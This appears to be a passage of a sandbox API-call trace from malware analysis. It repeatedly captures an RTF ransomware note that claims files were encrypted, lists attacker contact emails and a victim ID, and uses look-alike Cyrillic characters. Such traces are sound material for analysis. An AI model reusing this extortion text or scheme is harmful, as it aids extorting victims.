d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 